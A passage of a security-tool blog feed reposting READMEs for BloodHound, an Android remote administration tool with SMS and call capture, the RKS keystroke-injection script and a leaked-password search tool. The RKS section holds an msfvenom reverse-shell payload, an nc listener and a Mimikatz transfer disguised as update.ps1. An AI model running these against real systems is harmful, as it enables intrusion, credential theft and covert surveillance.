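EDGES = [
    ("alice@corp.local", "MemberOf", "helpdesk@corp.local"),
    ("helpdesk@corp.local", "AdminTo", "ws01.corp.local"),
    ("ws01.corp.local", "HasSession", "bob@corp.local"),
    ("bob@corp.local", "MemberOf", "domain admins@corp.local"),
    ("carol@corp.local", "MemberOf", "finance@corp.local"),
    ("finance@corp.local", "AdminTo", "fs01.corp.local"),
]


def build_graph(edges):
    """Adjacency list: node -> list of (relationship, neighbour)."""
    graph = {}
    for src, rel, dst in edges:
        graph.setdefault(src, []).append((rel, dst))
        graph.setdefault(dst, [])
    return graph


def shortest_attack_path(graph, start, target):
    """Breadth-first search from start. Returns the path as a list of
    (node, relationship, node) hops, or None if target is unreachable."""
    queue = deque([start])
    parent = {start: None}
    while queue:
        node = queue.popleft()
        if node == target:
            break
        for rel, nxt in graph.get(node, []):
            if nxt not in parent:          # first visit is the shortest
                parent[nxt] = (node, rel)
                queue.append(nxt)
    if target not in parent:
        return None
    hops, node = [], target
    while parent[node] is not None:
        prev, rel = parent[node]
        hops.append((prev, rel, node))
        node = prev
    hops.reverse()
    return hops


def principals_with_path(graph, target):
    """Every node from which the target is reachable: the blast radius a
    defender wants to shrink."""
    return sorted(n for n in graph
                  if n != target and shortest_attack_path(graph, n, target))


if __name__ == "__main__":
    g = build_graph(EDGES)
    for hop in shortest_attack_path(g, "alice@corp.local",
                                    "domain admins@corp.local") or []:
        print(" -> ".join(hop))
```

<p>Running the same search from every node gives the set of principals that can reach a target, which is the number a defender wants to drive down. Real collectors add many more edge types, and the shortest path is not necessarily the cheapest one to execute.</p> <p>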
The original BloodHound was created by <a href="https://www.twitter.com/_wald0" rel="nofollow" target="_blank" title="@_wald0">@_wald0</a>, <a href="https://twitter.com/CptJesus" rel="nofollow" target="_blank" title="@CptJesus">@CptJesus</a>, and <a href="https://twitter.com/harmj0y" rel="nofollow" target="_blank" title="@harmj0y">@harmj0y</a>.</p> <span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Running BloodHound Community Edition</b></span><br /> <p>The easiest way to get up and running is to use our pre-configured Docker Compose setup. The following steps will get BloodHound CE up and running with the least amount of effort.</p> <ol> <li>Install Docker Compose and ensure Docker is running. This should be included with the <a href="https://www.docker.com/products/docker-desktop/" rel="nofollow" target="_blank" title="Docker Desktop">Docker Desktop</a> installation</li> <li>Run <code>curl -L https://ghst.ly/getbhce | docker compose -f - up</code>. This pipes a Compose file fetched from the Internet straight into Docker; if you want to read it first, save it with <code>curl -L https://ghst.ly/getbhce -o docker-compose.yml</code> and run <code>docker compose up</code> from that directory.</li> <li>Locate the randomly generated password in the terminal output of Docker Compose</li> <li>In a browser, navigate to <code>http://localhost:8080/ui/login</code>. Log in with the username <code>admin</code> and the randomly generated password from the logs</li> </ol> <p>NOTE: going forward, the default <code>docker-compose.yml</code> example binds only to localhost (127.0.0.1). If you want to access BloodHound outside of localhost, you'll need to follow the instructions in <a href="https://github.com/SpecterOps/examples/docker-compose/README.md" rel="nofollow" target="_blank" title="examples/docker-compose/README.md">examples/docker-compose/README.md</a> to configure the host binding for the container.</p> <br /><span style="font-size: large;"><b>Installation Error Handling</b></span><br /> <ul> <li>If you encounter "failed to get console mode for stdin: The handle is invalid.", ensure Docker Desktop (and the associated Engine) is running. 
Docker Desktop does not automatically register as a startup entry. </li> </ul> <p align="center"> <a href="https://blogger.googleusercontent.com/img/a/AVvXsEixBUvpG_6szaiuByEzz3zh7iCMbX8LXKZYHn9tniatuu1NfiBQBZUQ_udqiY1ePjGCsvfGgO-5xx5Y7bP_WfoQhbNhT0IaDRIMZzXiMDYjg-OqXsPasZVUL1reVZ8lshcNjP51LIw6MkyodfjUp9f7wh0w1j7_8Wf2zI_rX4BnaFmYdfTZeo61Ly_Ql7VP"><img alt="" border="0" id="BLOGGER_PHOTO_ID_7338668301600612402" src="https://blogger.googleusercontent.com/img/a/AVvXsEixBUvpG_6szaiuByEzz3zh7iCMbX8LXKZYHn9tniatuu1NfiBQBZUQ_udqiY1ePjGCsvfGgO-5xx5Y7bP_WfoQhbNhT0IaDRIMZzXiMDYjg-OqXsPasZVUL1reVZ8lshcNjP51LIw6MkyodfjUp9f7wh0w1j7_8Wf2zI_rX4BnaFmYdfTZeo61Ly_Ql7VP=s320" /></a> </p> <ul> <li>If you encounter an "Error response from daemon: Ports are not available: exposing port TCP 127.0.0.1:7474 -> 0.0.0.0:0: listen tcp 127.0.0.1:7474: bind: Only one usage of each socket address (protocol/network address/port) is normally permitted." this is normally attributed to the "Neo4J Graph Database - neo4j" service already running on your local system. 
Please stop or delete the service to continue.</li> </ul> <pre><code># Verify if Docker Engine is Running<br />docker info<br /><br /># Attempt to stop Neo4j Service if running (on Windows)<br />Stop-Service "Neo4j" -ErrorAction SilentlyContinue<br /></code></pre> <ul> <li>A successful installation of BloodHound CE would look like the below:</li> </ul> <p>https://github.com/SpecterOps/BloodHound/assets/12970156/ea9dc042-1866-4ccb-9839-933140cc38b9</p> <br /><span style="font-size: large;"><b>Useful Links</b></span><br /> <ul> <li><a href="https://ghst.ly/BHSlack" rel="nofollow" target="_blank" title="BloodHound Slack">BloodHound Slack</a></li> <li><a href="https://github.com/SpecterOps/BloodHound/wiki" rel="nofollow" target="_blank" title="Wiki">Wiki</a></li> <li><a href="https://github.com/SpecterOps/CONTRIBUTORS.md" rel="nofollow" target="_blank" title="Contributors">Contributors</a></li> <li><a href="https://github.com/SpecterOps/examples/docker-compose/README.md" rel="nofollow" target="_blank" title="Docker Compose Example">Docker Compose Example</a></li> <li><a href="https://support.bloodhoundenterprise.io/" rel="nofollow" target="_blank" title="BloodHound Docs">BloodHound Docs</a></li> <li><a href="https://github.com/SpecterOps/BloodHound/wiki/Development" rel="nofollow" target="_blank" title="Developer Quick Start Guide">Developer Quick Start Guide</a></li> <li><a href="https://github.com/SpecterOps/BloodHound/wiki/Contributing" rel="nofollow" target="_blank" title="Contributing Guide">Contributing Guide</a></li> </ul> <br /><span style="font-size: large;"><b>Contact</b></span><br /> <p>Please check out the <a href="https://github.com/SpecterOps/BloodHound/wiki/Contact" rel="nofollow" target="_blank" title="Contact page">Contact page</a> in our wiki for details on how to reach out with questions and suggestions.</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" 
href="https://github.com/SpecterOps/BloodHound" rel="nofollow" target="_blank" title="Download BloodHound">Download BloodHound</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-54393976504929775122024-03-03T08:30:00.001-03:002024-03-03T08:30:00.143-03:00Tinyfilemanager-Wh1Z-Edition - Effortlessly Browse And Manage Your Files With Ease Using Tiny File Manager [WH1Z-Edition], A Compact Single-File PHP File Manager<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhKijDg7HK2WUMAOdgFR5IkVZrsW_gfvWlKW8-GeGIdiDQ-u-pwTBi0MNdknEqm4sgtPqGVm79dm1n7vsFbDt32tvYJR56vzeBODx87u8E_-cZb2M4ZVtIuXu4ET1pcs8xJbO6oYD0cdhhIX4ghf6FMUHxDPdTGBPEuGvBjSqbXWpaemnH4ilOVqcSITXcm"><img alt="" border="0" height="340" id="BLOGGER_PHOTO_ID_7337937213045492242" src="https://blogger.googleusercontent.com/img/a/AVvXsEhKijDg7HK2WUMAOdgFR5IkVZrsW_gfvWlKW8-GeGIdiDQ-u-pwTBi0MNdknEqm4sgtPqGVm79dm1n7vsFbDt32tvYJR56vzeBODx87u8E_-cZb2M4ZVtIuXu4ET1pcs8xJbO6oYD0cdhhIX4ghf6FMUHxDPdTGBPEuGvBjSqbXWpaemnH4ilOVqcSITXcm=w640-h340" width="640" /></a></p><div><br /></div> <blockquote> <p>Introducing Tiny File Manager [WH1Z-Edition], the compact and efficient solution for managing your files and folders with enhanced privacy and security features. Gone are the days of relying on external resources – I've stripped down the code to its core, making it truly lightweight and perfect for deployment in environments without internet access or outbound connections.</p> <p>Designed for simplicity and speed, Tiny File Manager [WH1Z-Edition] retains all the essential functionalities you need for storing, uploading, editing, and managing your files directly from your web browser. With a single-file PHP setup, you can effortlessly drop it into any folder on your server and start organizing your files immediately.</p> <p>What sets Tiny File Manager [WH1Z-Edition] apart is its focus on privacy and security. 
By removing the reliance on external domains for CSS and JS resources, your data stays localized and protected from potential <a href="https://www.kitploit.com/search/label/vulnerabilities" target="_blank" title="vulnerabilities">vulnerabilities</a> or leaks. This makes it an ideal choice for scenarios where data integrity and confidentiality are paramount, including RED TEAMING exercises or restricted server environments.</p></blockquote><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Requirements</b></span><br /> <ul> <li>PHP 5.5.0 or higher.</li> <li>Fileinfo, iconv, zip, tar and mbstring extensions are strongly recommended.</li> </ul> <br /><span style="font-size: large;"><b>How to use</b></span><br /> <p>Download the ZIP of the latest version from the master branch.</p> <p>Simply transfer the "tinyfilemanager-wh1z.php" file to your web hosting space – it's as easy as that! Feel free to rename the file to whatever suits your needs best.</p> <p>The <a href="https://www.kitploit.com/search/label/Default%20Credentials" target="_blank" title="default credentials">default credentials</a> are as follows: <strong>admin/WH1Z@1337</strong> and <strong>user/WH1Z123</strong>.</p> <p>:warning: Caution: Before use, it is imperative to set your own username and password within the <code>$auth_users</code> variable. Passwords are not stored in clear text: the array holds hashes produced by PHP's <code>password_hash()</code>, so the published default hashes are known to anyone who reads the source. </p> <p>ℹ️ You can generate a new password hash as follows: Login as Admin -> Click Admin -> Help -> Generate new password hash</p> <p>:warning: Caution: Use the built-in password generator for your privacy and security. 
😉</p> <p>To enable/disable <a href="https://www.kitploit.com/search/label/Authentication" target="_blank" title="authentication">authentication</a> set <code>$use_auth</code> to true or false.</p> <br /><b>:loudspeaker: Key Features</b><br /> <ul> <li>:cd: Open Source, lightweight, and incredibly user-friendly</li> <li>:iphone: Optimized for mobile devices, ensuring a seamless touch experience</li> <li>:information_source: Core functionalities including file creation, deletion, modification, viewing, downloading, copying, and moving</li> <li>:arrow_double_up: Efficient Ajax Upload functionality, supporting drag & drop, URL uploads, and multiple file uploads with file extension filtering</li> <li>:file_folder: Intuitive options for creating both folders and files</li> <li>:gift: Capability to compress and extract files (<code>zip</code>, <code>tar</code>)</li> <li>:sunglasses: Flexible user permissions system, based on session and user root folder mapping</li> <li>:floppy_disk: Easy copying of direct file URLs for streamlined sharing</li> <li>:pencil2: Integration with Cloud9 IDE, offering syntax highlighting for over <code>150+</code> languages and a selection of <code>35+</code> themes</li> <li>:page_facing_up: Seamless integration with Google/Microsoft doc viewer for previewing various file types such as <code>PDF/DOC/XLS/PPT/etc</code>. 
Files up to 25 MB can be previewed using the Google Drive viewer</li> <li>:zap: Backup functionality, IP blacklist/whitelist management, and more</li> <li>:mag_right: Powerful search capabilities using <code>datatable js</code> for efficient file filtering</li> <li>:file_folder: Ability to exclude specific folders and files from the listing</li> <li>:globe_with_meridians: Multi-language support (32+ languages) with a built-in translation feature, requiring no additional files</li> <li>:bangbang: And much more...</li> </ul> <br /><b><a name="license" target="_blank" title="Effortlessly browse and manage your files with ease using Tiny File Manager [WH1Z-Edition], a compact single-file PHP file manager. (8)"></a>License, Credit</b><br /> <ul> <li>Available under the <a href="https://github.com/PinoyWH1Z/tinyfilemanager-wh1z-edition/blob/master/LICENSE" rel="nofollow" target="_blank" title="GNU license">GNU license</a></li> <li>Original concept and development by github.com/prasathmani/tinyfilemanager</li> <li>CDN Used - <em>jQuery, Bootstrap, Font Awesome, Highlight js, ace js, DropZone js, and DataTable js</em></li> <li>To report a bug or request a feature, please file an <a href="https://github.com/PinoyWH1Z/tinyfilemanager-wh1z-edition/issues" rel="nofollow" target="_blank" title="issue">issue</a></li> </ul><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/PinoyWH1Z/tinyfilemanager-wh1z-edition" rel="nofollow" target="_blank" title="Download Tinyfilemanager-Wh1Z-Edition">Download Tinyfilemanager-Wh1Z-Edition</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-42295666330003857822024-03-02T22:01:00.002-03:002024-03-02T22:01:27.800-03:00Kali Linux 2024.1 - Penetration Testing and Ethical Hacking Linux Distribution<div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: 
center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHxmgnPnFWLMi89MxWFqpyXnD9tTAwrUKj90bso-fwtYvqhK8Ho29AjUD7D_SSasRQ_gxYhOS03kx7mAJKGwokwu-P6hmRnyKwCpqR4_dIfq44zid2fuEoOnqBN1_w_gI5IScv6OYIgkvFAvzPCi6ZLNW1L1tMvbBZyiRwKeJXVVkfsodT76cez3tWIc29/s1200/kali-linux-banner-2024.1-release.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="628" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHxmgnPnFWLMi89MxWFqpyXnD9tTAwrUKj90bso-fwtYvqhK8Ho29AjUD7D_SSasRQ_gxYhOS03kx7mAJKGwokwu-P6hmRnyKwCpqR4_dIfq44zid2fuEoOnqBN1_w_gI5IScv6OYIgkvFAvzPCi6ZLNW1L1tMvbBZyiRwKeJXVVkfsodT76cez3tWIc29/w640-h334/kali-linux-banner-2024.1-release.jpg" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div></div><p></p>
Time for another Kali Linux release! – Kali Linux 2024.1. This release has various impressive updates.<span><a name='more'></a></span><div><p><br /></p><p>The summary of the <a href="https://bugs.kali.org/changelog_page.php">changelog</a> since the <a href="https://www.kali.org/blog/kali-linux-2023-4-release/">2023.4 release from December</a> is:</p><ul><li><strong><a href="https://www.kali.org/blog/kali-linux-2024-1-release/#introducing-the-micro-mirror-free-software-cdn">Micro Mirror Free Software CDN</a></strong> - FCIX Software Mirror reached out offering to host our images, and we said yes</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2024-1-release/#2024-theme-refresh">2024 Theme Refresh</a></strong> - Our yearly theme refresh with all new wallpapers and GRUB theme</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2024-1-release/#other-desktop-changes">Other Desktop Environment Changes</a></strong> - A few new tweaks to our default environments</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2024-1-release/#kali-nethunter-updates">NetHunter Updates</a></strong> - NetHunter Rootless for Android 14, Bad Bluetooth HID attacks, and other updates</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2024-1-release/#new-tools-in-kali">New Tools</a></strong> - As always, various new shiny tools!</li></ul></div><div><br />
<b>More info <a href="https://www.kali.org/blog/kali-linux-2024-1-release/">here</a>.</b><br /><br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://www.kali.org/get-kali/" rel="nofollow" target="_blank" title="Download Kali Linux">Download Kali Linux 2024.1</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-89733141207763984652024-03-02T08:30:00.005-03:002024-03-02T08:30:00.119-03:00Moukthar - Android Remote Administration Tool<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhcdWz2kKUnn43FCqdqvgv_4xjtcuRU8oGSxY0Qew4knORk5w6tvcMdX15ebD7q9AMAF70ETEo4UBp66fLCvYtWjU3iOW2G8NJ-PSfe6krUWQo_TyNJvGegdHxj7RmTXY5yWmfQziKWr5jDbVOf499u-OZzpr3VTWjUbtpqI3wMfZ7P0sIn4OhVvIjlplCp"><img alt="" border="0" height="308" id="BLOGGER_PHOTO_ID_7337936731549409714" src="https://blogger.googleusercontent.com/img/a/AVvXsEhcdWz2kKUnn43FCqdqvgv_4xjtcuRU8oGSxY0Qew4knORk5w6tvcMdX15ebD7q9AMAF70ETEo4UBp66fLCvYtWjU3iOW2G8NJ-PSfe6krUWQo_TyNJvGegdHxj7RmTXY5yWmfQziKWr5jDbVOf499u-OZzpr3VTWjUbtpqI3wMfZ7P0sIn4OhVvIjlplCp=w640-h308" width="640" /></a></p><div><br /></div> <p>Remote adminitration tool for android</p> <br /><span style="font-size: large;"><b>Features</b></span><br /> <ul> <li>Notifications listener</li> <li>SMS listener</li> <li>Phone call recording</li> <li>Image capturing and screenshots</li> <li>Persistence </li> <li>Read & write contacts</li> <li>List installed applications</li> <li>Download & upload files</li> <li>Get device location</li></ul><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Installation</b></span><br /> <ul> <li>Clone repository <code>console git clone https://github.com/Tomiwa-Ot/moukthar.git</code></li> <li>Move server files to <code>/var/www/html/</code> and install dependencies <code>console mv moukthar/Server/* /var/www/html/ cd /var/www/html/c2-server composer install cd /var/www/html/web\ socket/ composer install</code> The <a href="https://www.kitploit.com/search/label/Default%20Credentials" 
target="_blank" title="default credentials">default credentials</a> are username: <code>android</code> and password: <code>the rastafarian in you</code></li> <li>Set database <a href="https://www.kitploit.com/search/label/Credentials" target="_blank" title="credentials">credentials</a> in <code>c2-server/.env</code> and <code>web socket/.env</code></li> <li>Execute <code>database.sql</code></li> <li>Start web socket server or deploy as service in linux <code>console php Server/web\ socket/App.php # OR sudo mv Server/websocket.service /etc/systemd/system/ sudo systemctl daemon-reload sudo systemctl enable websocket.service sudo systemctl start websocket.service</code></li> <li>Modify <code>/etc/apache2/apache2.conf</code> <code>xml <Directory /var/www/html/c2-server> Options -Indexes DirectoryIndex app.php AllowOverride All Require all granted </Directory></code></li> <li>Set C2 server and web socket server address in client <code>functionality/Utils.java</code> ```java public static final String C2_SERVER = "http://localhost";</li> </ul> <p>public static final String WEB_SOCKET_SERVER = "ws://localhost:8080"; ``` - Compile APK using <a href="https://www.kitploit.com/search/label/Android%20Studio" target="_blank" title="Android Studio">Android Studio</a> and deploy to target</p> <div><br /></div><span style="font-size: large;"><b>TODO</b></span><br /> <ul> <li>Auto scroll logs on dashboard</li> </ul><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/Tomiwa-Ot/moukthar" rel="nofollow" target="_blank" title="Download Moukthar">Download Moukthar</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-71304122770715920032024-03-01T08:30:00.000-03:002024-03-01T08:30:00.125-03:00RKS - A Script To Automate Keystrokes Through A Graphical Desktop Program<div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0XDiXypTK-P_SJe6-IPlWn0NhMiHd3yskhfaVmlqOdirJRN54QZsmCsTXhRFK586TVOBTldBPZXoAsN5JKsnzvWalJT8meCNIRa8IlwhYjMR9HbicCtfYthEcraze2KNpzgDZMcCPeBuKcx-3WSXTQK2VMxHQtOKSp4O8sndz8hsFKH5lyXku-C5YePKU/s1271/RKS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="691" data-original-width="1271" height="348" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0XDiXypTK-P_SJe6-IPlWn0NhMiHd3yskhfaVmlqOdirJRN54QZsmCsTXhRFK586TVOBTldBPZXoAsN5JKsnzvWalJT8meCNIRa8IlwhYjMR9HbicCtfYthEcraze2KNpzgDZMcCPeBuKcx-3WSXTQK2VMxHQtOKSp4O8sndz8hsFKH5lyXku-C5YePKU/w640-h348/RKS.png" width="640" /></a></div><p><br /></p> <p>A script to automate keystrokes through an active <a href="https://www.kitploit.com/search/label/Remote%20Desktop" target="_blank" title="remote desktop">remote desktop</a> session that assists offensive operators in combination with <a href="https://www.kitploit.com/search/label/Living%20Off%20The%20Land" target="_blank" title="living off the land">living off the land</a> techniques.</p> <br /><span style="font-size: large;"><b>About RKS (RemoteKeyStrokes)</b></span><br /> <p>All credits goes to <a href="https://github.com/nopernik" rel="nofollow" target="_blank" title="nopernik">nopernik</a> for making it possible so I took it upon myself to improve it. 
I wanted something that helps during the <a href="https://www.kitploit.com/search/label/Post%20Exploitation" target="_blank" title="post exploitation">post exploitation</a> phase when executing commands through a remote desktop.</p> <span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Help Menu</b></span><br /> <pre><code>$ ./rks.sh -h<br />Usage: ./rks.sh (RemoteKeyStrokes)<br />Options:<br /> -c, --command <command | cmdfile> Specify a command or a file containing commands to execute<br /> -i, --input <input_file> Specify the local input file to transfer<br /> -o, --output <output_file> Specify the remote output file to transfer<br /> -m, --method <method> Specify the file transfer or execution method<br /> (For file transfer "base64" is set by default if<br /> not specified. For execution method "none" is set<br /> by default if not specified)<br /><br /> -p, --platform <operating_system> Specify the operating system (windows is set by<br /> default if not specified)<br /><br /> -w, --windowname <name> Specify the window name for graphical remote<br /> program (freerdp is set by default if not<br /> specified)<br /><br /> -h, --help Display this help message<br /></code></pre> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <br /><b>Internal Reconnaissance</b><br /> <ul> <li>When running in a command prompt</li> </ul> <pre><code>$ cat recon_cmds.txt<br />whoami /all<br />net user<br />net localgroup Administrators<br />net user /domain<br />net group "Domain Admins" /domain<br />net group "Enterprise Admins" /domain<br />net group "Domain Computers" /domain<br /><br />$ ./rks.sh -c recon_cmds.txt<br /></code></pre> <br /><b>Execute Implant</b><br /> <ul> <li>Execute an implant by typing the contents of the payload into PowerShell.</li> </ul> <pre><code>$ msfvenom -p windows/x64/shell_reverse_tcp lhost=<IP> lport=4444 -f psh -o implant.ps1<br /><br />$ ./rks.sh -c implant.ps1<br /><br />$ nc -lvnp 4444<br /></code></pre> <br 
/><b>File Transfer</b><br /> <ul> <li>Transfer a file remotely when pivoting in an isolated network. If you want to specify the remote path on Windows, be sure to include quotes.</li> </ul> <pre><code>$ ./rks.sh -i /usr/share/powersploit/Privesc/PowerUp.ps1 -o script.ps1<br /><br />$ ./rks.sh -i /usr/share/powersploit/Exfiltration/Invoke-Mimikatz.ps1 -o "C:\Windows\Temp\update.ps1" -m base64<br /></code></pre> <br /><b>Specify Graphical Remote Software</b><br /> <ul> <li>If you're targeting a VNC session, specify the window name with <code>tightvnc</code>.</li> </ul> <p><code>$ ./rks.sh -i implant.ps1 -w tightvnc</code></p> <ul> <li>If you're targeting legacy operating systems with older RDP <a href="https://www.kitploit.com/search/label/Authentication" target="_blank" title="authentication">authentication</a>, specify the window name with <code>rdesktop</code>.</li> </ul> <p><code>$ ./rks.sh -i implant.bat -w rdesktop</code></p> <br /><span style="font-size: large;"><b>TODO and Help Wanted</b></span><br /> <ul> <li> <p>Add text colors for a better user experience</p> </li> <li> <p>Implement Base64 file transfer</p> </li> <li> <p>Implement Bin2Hex file transfer</p> </li> <li> <p>Implement a persistence function for both Windows and Linux</p> </li> <li> <p>Implement an <a href="https://www.kitploit.com/search/label/Antiforensics" target="_blank" title="antiforensics">antiforensics</a> function for both Windows and Linux</p> </li> <li> <p>Implement reading shellcode input and running a C# implant and PowerShell runspace</p> </li> <li> <p>Implement a privesc function for both Windows and Linux</p> </li> </ul> <br /><span style="font-size: large;"><b>References</b></span><br /> <ul> <li> <p><a href="https://www.youtube.com/watch?v=8YFEujJUxws" rel="nofollow" target="_blank" title="Video: sethc.exe Backdoor CMD Payload delivery (USB Rubber Ducky style)">Video: sethc.exe Backdoor CMD Payload delivery (USB Rubber Ducky style)</a></p> </li> <li> <p><a 
href="https://github.com/nopernik/mytools/blob/master/rdp-cmd-delivery.sh" rel="nofollow" target="_blank" title="Original Script">Original Script</a></p> </li> <li> <p><a href="https://github.com/ztgrace/sticky_keys_hunter" rel="nofollow" target="_blank" title="sticky_keys_hunter">sticky_keys_hunter</a></p> </li> </ul> <br /><span style="font-size: large;"><b>Credits</b></span><br /> <ul> <li><a href="https://github.com/nopernik" rel="nofollow" target="_blank" title="nopernik">nopernik</a></li> </ul><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/U53RW4R3/RKS" rel="nofollow" target="_blank" title="Download RKS">Download RKS</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-57521009068010929142024-02-29T20:30:00.003-03:002024-02-29T20:30:00.125-03:00LeakSearch - Search & Parse Password Leaks<p align="center"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgalFuqSTMVub-Sx0tu5NnujnSSIjVp_zOdv97hjJdympwu7RU0SdvZAKWOtUfhEGyN-PixHDck0O78q2udqUlqYIr5Vbo6vadwj0JG5GFRaxy9a4HltYVFKjXqrpWZwerTC7vKCkST6q_j1ag7BQOwyykSTvswSIVnKN0wG7j6mwhGhE6xK2z6FDijFZMP"><img alt="" border="0" height="404" id="BLOGGER_PHOTO_ID_7337931135416379826" src="https://blogger.googleusercontent.com/img/a/AVvXsEgalFuqSTMVub-Sx0tu5NnujnSSIjVp_zOdv97hjJdympwu7RU0SdvZAKWOtUfhEGyN-PixHDck0O78q2udqUlqYIr5Vbo6vadwj0JG5GFRaxy9a4HltYVFKjXqrpWZwerTC7vKCkST6q_j1ag7BQOwyykSTvswSIVnKN0wG7j6mwhGhE6xK2z6FDijFZMP=w640-h404" width="640" /></a></p> <br /> <p><strong>LeakSearch</strong> is a simple tool to search and parse plain text <a href="https://www.kitploit.com/search/label/Passwords" target="_blank" title="passwords">passwords</a> using ProxyNova COMB (Combination Of Many Breaches) over the Internet. You can define a custom proxy and you can also use your own password file, to search using different keywords: such as user, domain or password. 
</p> <p>In addition, you can define how many results you want to display on the terminal and export them as <a href="https://www.kitploit.com/search/label/JSON" target="_blank" title="JSON">JSON</a> or TXT files. Due to the simplicity of the code, it is very easy to add new sources, so more providers will be added in the future.</p> <span><a name='more'></a></span><div><br /></div><span style="font-size: x-large;"><b>Requirements</b></span><br /> <ul> <li>Python 3</li> <li>Install the requirements</li> </ul> <br /><span style="font-size: x-large;"><b>Download</b></span><br /> <p>It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:</p> <pre><code>git clone https://github.com/JoelGMSec/LeakSearch<br /></code></pre> <br /><span style="font-size: x-large;"><b>Usage</b></span><br /> <pre><code>usage: LeakSearch.py [-h] [-d DATABASE] [-k KEYWORD] [-n NUMBER] [-o OUTPUT] [-p PROXY]<br /><br />options:<br />  -h, --help            show this help message and exit<br />  -d DATABASE, --database DATABASE<br />                        Database used for the search (ProxyNova or LocalDataBase)<br />  -k KEYWORD, --keyword KEYWORD<br />                        Keyword (user/domain/pass) to search for leaks in the DB<br />  -n NUMBER, --number NUMBER<br />                        Number of results to show (default is 20)<br />  -o OUTPUT, --output OUTPUT<br />                        Save the results as json or txt into a file<br />  -p PROXY, --proxy PROXY<br />                        Set HTTP/S proxy (like http://localhost:8080)<br /></code></pre> <br /><span style="font-size: large;"><b>A detailed usage guide can be found at the 
following link:</b></span><br /> <p>https://darkbyte.net/buscando-y-filtrando-contrasenas-con-leaksearch</p> <br /><span style="font-size: x-large;"><b>License</b></span><br /> <p>This project is licensed under the <a href="https://www.kitploit.com/search/label/GNU" target="_blank" title="GNU">GNU</a> 3.0 license - see the LICENSE file for more details.</p> <br /><span style="font-size: x-large;"><b>Credits and Acknowledgments</b></span><br /> <p>This tool has been created and designed from scratch by Joel Gámez Molina (@JoelGMSec).</p> <br /><span style="font-size: x-large;"><b>Contact</b></span><br /> <p>This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.</p> <p>For more information, you can find me on <a href="https://www.kitploit.com/search/label/Twitter" target="_blank" title="Twitter">Twitter</a> as <a href="https://twitter.com/JoelGMSec" rel="nofollow" target="_blank" title="@JoelGMSec">@JoelGMSec</a> and on my blog <a href="https://darkbyte.net" rel="nofollow" target="_blank" title="darkbyte.net">darkbyte.net</a>.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/JoelGMSec/LeakSearch" rel="nofollow" target="_blank" title="Download LeakSearch">Download LeakSearch</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-11649254077707006222024-02-28T08:30:00.008-03:002024-02-28T08:30:00.130-03:00CanaryTokenScanner - Script Designed To Proactively Identify Canary Tokens Within Microsoft Office Documents And Acrobat Reader PDF (docx, xlsx, pptx, pdf)<p style="text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/a/AVvXsEgwVXueB5F2b67Yyrfb_cROA2YmSiABp_GfA29nu62xPpn6hQz3DKfCKTb_GDjKZ6RNmBQF1Bv2hRbCODlOxt6r48okD8RUYr2XgFFS3a3bckQVfOjCQpX5Mqr52N3Cofk-ViPoqgf1SZ5PI6aUM-fFVvaHnWf5q9rXcTwmbmhVFNRGyFfinbcUC_gs4_AG"><img alt="" border="0" height="122" id="BLOGGER_PHOTO_ID_7337930840565836562" src="https://blogger.googleusercontent.com/img/a/AVvXsEgwVXueB5F2b67Yyrfb_cROA2YmSiABp_GfA29nu62xPpn6hQz3DKfCKTb_GDjKZ6RNmBQF1Bv2hRbCODlOxt6r48okD8RUYr2XgFFS3a3bckQVfOjCQpX5Mqr52N3Cofk-ViPoqgf1SZ5PI6aUM-fFVvaHnWf5q9rXcTwmbmhVFNRGyFfinbcUC_gs4_AG=w640-h122" width="640" /></a></p><div><br /></div><span style="font-size: large;"><b>Detecting Canary Tokens and Suspicious URLs in <a href="https://www.kitploit.com/search/label/Microsoft" target="_blank" title="Microsoft">Microsoft</a> Office, Acrobat Reader PDF and Zip Files</b></span><br /> <br /><b>Introduction</b><br /> <p>In the dynamic realm of cybersecurity, vigilance and proactive <a href="https://www.kitploit.com/search/label/Defense" target="_blank" title="defense">defense</a> are key. Malicious actors often leverage Microsoft Office files and Zip archives, embedding covert URLs or macros that initiate harmful actions when the file is 